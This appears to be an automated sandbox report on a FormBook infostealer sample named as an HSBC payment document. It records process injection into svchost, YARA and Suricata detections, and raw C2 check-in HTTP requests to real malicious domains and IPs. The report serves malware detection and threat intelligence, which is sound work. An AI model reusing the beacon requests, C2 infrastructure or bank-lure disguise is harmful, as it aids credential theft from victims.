Edit tour

Windows Analysis Report
rHSBCBank_Paymentswiftcpy.exe

Overview

General Information

Sample name:	rHSBCBank_Paymentswiftcpy.exe
Analysis ID:	1539076
MD5:	6ba55b78696072ea7f7f56c955fe1c0b
SHA1:	7f061f071b237e9defd98fbfdea99caebe97960d
SHA256:	8771179cb6f0488244c65cdfab07668bfaea4d0b28a77ee94879448662fde67e
Tags:	exeuser-Porcupine
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

rHSBCBank_Paymentswiftcpy.exe (PID: 5672 cmdline: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe" MD5: 6BA55B78696072EA7F7F56C955FE1C0B)

svchost.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

EqOUZfSIzU.exe (PID: 5696 cmdline: "C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

sdchange.exe (PID: 6324 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)

EqOUZfSIzU.exe (PID: 5776 cmdline: "C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2eea3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ba393:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2a2582:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x54f68:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3d157:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ba393:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2a2582:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e0a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2eea3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ParentImage: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe, ParentProcessId: 5672, ParentProcessName: rHSBCBank_Paymentswiftcpy.exe, ProcessCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ProcessId: 4208, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ParentImage: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe, ParentProcessId: 5672, ParentProcessName: rHSBCBank_Paymentswiftcpy.exe, ProcessCommandLine: "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe", ProcessId: 4208, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-22T05:38:36.187115+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49868	208.91.197.27	80	TCP
2024-10-22T05:39:08.255197+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49975	198.44.251.203	80	TCP
2024-10-22T05:39:21.895109+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49980	81.2.196.19	80	TCP
2024-10-22T05:39:35.613850+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49984	195.110.124.133	80	TCP
2024-10-22T05:39:49.438369+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49988	54.67.87.110	80	TCP
2024-10-22T05:40:07.806885+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49992	199.59.243.227	80	TCP
2024-10-22T05:40:21.217859+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49996	162.213.249.216	80	TCP
2024-10-22T05:40:36.679327+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	50000	221.121.144.149	80	TCP
2024-10-22T05:40:50.204838+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	50004	199.59.243.227	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: hentaistgma.net

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Source: rHSBCBank_Paymentswiftcpy.exe	ReversingLabs: Detection: 34%
Source: rHSBCBank_Paymentswiftcpy.exe	Virustotal: Detection: 41%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rHSBCBank_Paymentswiftcpy.exe

Joe Sandbox ML: detected

Source: rHSBCBank_Paymentswiftcpy.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EqOUZfSIzU.exe, 00000004.00000000.2301808549.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3954823867.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111913806.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, rHSBCBank_Paymentswiftcpy.exe, 00000000.00000003.2111155824.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2283665751.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2378891144.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285797613.0000000003700000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000003.2381381472.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2382802271.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958035477.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.000000000532C000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000000.2449645139.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000122FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2347900801.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347954888.0000000003224000.00000004.00000020.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955254790.00000000007F8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0078445A
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078C6D1 FindFirstFileW,FindClose,	0_2_0078C6D1
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0078C75C
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0078EF95
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0078F0F2
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0078F3F3
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007837EF
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00783B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00783B12
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0078BCBC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E1C0D0 FindFirstFileW,FindNextFileW,FindClose,	5_2_02E1C0D0

Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 4x nop then xor eax, eax	5_2_02E09A90
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 4x nop then pop edi	5_2_02E0DCD9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_04BE04E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49992 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49980 -> 81.2.196.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49975 -> 198.44.251.203:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49868 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 221.121.144.149:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49988 -> 54.67.87.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49996 -> 162.213.249.216:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49984 -> 195.110.124.133:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.ngmr.xyz
Source:	DNS query: www.inf30027group23.xyz
Source:	DNS query: www.inf30027group23.xyz
Source:	DNS query: www.shopdj00.xyz

Source: Joe Sandbox View	IP Address: 195.110.124.133 195.110.124.133
Source: Joe Sandbox View	IP Address: 54.67.87.110 54.67.87.110

Source: Joe Sandbox View	ASN Name: REGISTER-ASIT REGISTER-ASIT
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_007922EE

Source: global traffic	HTTP traffic detected: GET /y9rm/?kT9p=HEdRnjuxtNGVPFRX3NZ2CbxO5KjoR5mZP9Y7+HX2gpvgKHiu4zeqhoni6TAVjjgJNor6P4ykumohRwGjoGuDnTy/l81TemUdGivRuw5GfSiykvy81pD0xLcKVnn388uSWX5E4Mc=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.crochetpets.onlineConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Source: global traffic	HTTP traffic detected: GET /81ii/?kT9p=iEYuKHcgXzrj54zBLQ0hZtaSJWaO6arULYSJgyArOy1vcIlOyDidBtx/KVwStm3n+ESjpSctJ0ezJOALnhKyScKD8qKcTeL6NPgmk/TuCnkayb3nWF3ZDNroKudPs/s9dqx/VNU=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.n0pme6.topConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Source: global traffic	HTTP traffic detected: GET /whrh/?kT9p=gnKfhumZE8ltP6GxVxsfSkoTPawS2VBtj7Y+npcg3eEMwAInvracgWsTZFjZCdkRXfgdTNdTzgCPtAFV2cUEHvPEtEwM8Ua8v+/63k/H/bL/ar8k5HyBDG0f7Adpr1HKjoqz2Rg=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kovallo.cloudConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Source: global traffic	HTTP traffic detected: GET /qhr1/?kT9p=4vyhfeGJy1HoJfLgdJHMJiiF5ffL7B9jTKxpb/iJoZFHl/RjV/1B5t3r6p0bkAeKssIvV+AadX2UVbSNYhzuXtrdtufHlrgwCycB7eSZz2zZKA9MpZFsx/+zuOBsemQBs3csDLA=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hentaistgma.netConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Source: global traffic	HTTP traffic detected: GET /ntib/?in1Hf=rx3dZnMxlRvDbR&kT9p=6gBoL4716wSvqjL5PCL9Otm46h/RO+qAgNOYViOcikg4H3EcrAY/v4xx2gixZebSxES1QV9P/IXhCYI/sCqyeCK3gvy3e15BfbqdhxqVigAySd7dFKOwRmIIBq2hI0q3F0AcNNQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Source: global traffic	HTTP traffic detected: GET /rul7/?kT9p=IsmUDGhGjZ2KRgAKfB1HvhyyLqsJdQP3pRKzZVZQCTxvTYvFu3rbLrLYLQVbGlcBi+aKp17AAiqCJ8w25lZIlYoTQ+zVINLm/1UHvGbwh9Y2v06871qB8K3SuXDNUGwH3DJAZfI=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.polarmuseum.infoConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Source: global traffic	HTTP traffic detected: GET /w48t/?in1Hf=rx3dZnMxlRvDbR&kT9p=jJf+uzLSIbfTebLlnllI962yuVk8Hw4tbleG5p05VL9UtkahhFlDUVJutvL9vCK8DEN3aeTkpXm8VBxSWq3LxvJEsjtiOsjWB/GCZl2Odas12ant1owrZYZ7neQtVdJoZOGoB8U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.tophcom.onlineConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Source: global traffic	HTTP traffic detected: GET /3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX+6J53waNs/qZsvobulOY9cjRmYN5o5DJXVIa4VTjeIROacIJgysQWwkDrvblS6LDkWdy22I4DlZH18HE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.inf30027group23.xyzConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
